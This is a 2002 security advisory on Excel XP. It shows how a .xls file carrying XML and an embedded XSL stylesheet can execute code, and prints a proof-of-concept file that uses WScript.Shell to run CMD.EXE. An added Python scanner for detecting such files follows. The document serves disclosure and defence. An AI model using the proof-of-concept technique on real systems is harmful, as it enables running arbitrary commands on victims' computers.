From: Georgi Guninski (guninskiGUNINSKI.COM)
Date: Fri May 24 2002 - 12:57:41 CDT

    Georgi Guninski security advisory #55, 2002

    Excel XP xml stylesheet problems

    Systems affected: Excel XP
    Risk: Low (user interaction required)
    Date: 24 May 2002

    Legal Notice:
    This Advisory is Copyright (c) 2002 Georgi Guninski.
    You may distribute it unmodified.
    You may not modify it and distribute it or distribute parts
    of it without the author's written permission.

    Disclaimer:
    The information in this advisory is believed to be true though
    it may be false.
    The opinions expressed in this advisory and program are my own and
    not of any company. The usual standard disclaimer applies,
    especially the fact that Georgi Guninski is not liable for any damages
    caused by direct or indirect use of the information or functionality
    provided by this advisory or program. Georgi Guninski bears no
    responsibility for content or misuse of this advisory or program or
    any derivatives thereof.
    Anything in this document may change without notice.

    Interesting news:
    According to
    http://www.eweek.com/article/0,3658,s%253D701%2526a%253D26875,00.asp
    "...He (MS) later acknowledged that some Microsoft code was so flawed
    it could not be safely disclosed..."
    LOL
    They call this trustworthy??????

    Description:

    Excel XP tries to play with new technologies like XML and XSLT.
    Unfortunately Excel seems "so flawed" that if the user
    opens a .xls file and chooses to view it with an xml stylesheet, arbitrary code
    may be executed. As script kiddies know, this may lead to taking full control
    over the user's computer. Excel does not give any warning to the user - just asks
    whether to use the style sheet or not. The default option is *not* to
    display with the stylesheet though.

    Details:

    Consider this xls file
    ------xls_sux.xls-----
    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
    <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
    <xsl:script>
    <![CDATA[
    x=new ActiveXObject("WScript.Shell");
    x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
    ]]>
    </xsl:script>
    <msux>
    msux
    written by georgi guninski
    </msux>
    </xsl:stylesheet>
    ----------------------

    It contains both XML and a stylesheet in one file.

    Workaround/Solution:
    Do not choose to use xml stylesheets in Excel if asked.
    poweroff(8) the poor windoze box if you see Excel mention stylesheets.

    Vendor status: microsoft was notified on 23 May 2002

    Regards,
    Georgi Guninski
    http://www.guninski.com
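
Added example, not part of the original advisory and not the author's code: a triage check for a mail gateway or file scanner that flags files named .xls whose content is really XML carrying an embedded stylesheet with script, the layout of the file shown in the advisory. The function name, the finding labels and all sample inputs are assumptions constructed for illustration.

```python
import re

# Magic bytes of an OLE2 compound file, the container of a binary .xls workbook.
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# The href may itself contain "?", so match lazily up to the closing "?>".
PI_RE = re.compile(rb"<\?xml-stylesheet\b(.*?)\?>", re.I | re.S)
HREF_RE = re.compile(rb"""href\s*=\s*["']([^"']*)["']""", re.I)
SCRIPT_RE = re.compile(rb"<(?:\w+:)?script\b", re.I)
ACTIVEX_RE = re.compile(rb"new\s+ActiveXObject\s*\(", re.I)

def scan_xls(data):
    """Return a list of finding labels for the bytes of a file named *.xls."""
    findings = []
    if data.startswith(OLE2_MAGIC):
        return findings  # binary workbook: not the XML case
    # Skip a UTF-8 BOM and leading whitespace (UTF-16 input is not handled).
    if not data.lstrip(b"\xef\xbb\xbf \t\r\n").startswith(b"<?xml"):
        return findings
    findings.append("xml-content-in-xls")
    pi = PI_RE.search(data)
    if pi:
        findings.append("xml-stylesheet-pi")
        href = HREF_RE.search(pi.group(1))
        # "#..." points back into the same file: XML and stylesheet in one.
        if href and href.group(1).startswith(b"#"):
            findings.append("self-referencing-stylesheet")
    if SCRIPT_RE.search(data):
        findings.append("script-element")
    if ACTIVEX_RE.search(data):
        findings.append("activex-instantiation")
    return findings

# Constructed sample with the same layout as the advisory's file; the script
# body only instantiates a placeholder ProgID.
SAMPLE_SUSPICIOUS = b'''<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?sheet" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script><![CDATA[
x = new ActiveXObject("Example.Placeholder");
]]></xsl:script>
<data>constructed</data>
</xsl:stylesheet>
'''
# Constructed benign inputs: plain XML saved as .xls, and a binary header.
SAMPLE_PLAIN_XML = b'<?xml version="1.0"?>\n<Workbook><Worksheet/></Workbook>\n'
SAMPLE_BINARY = OLE2_MAGIC + b"\x00" * 16
```

A file that yields `self-referencing-stylesheet` together with `script-element` is the combination worth quarantining; `xml-content-in-xls` alone also matches ordinary XML spreadsheets.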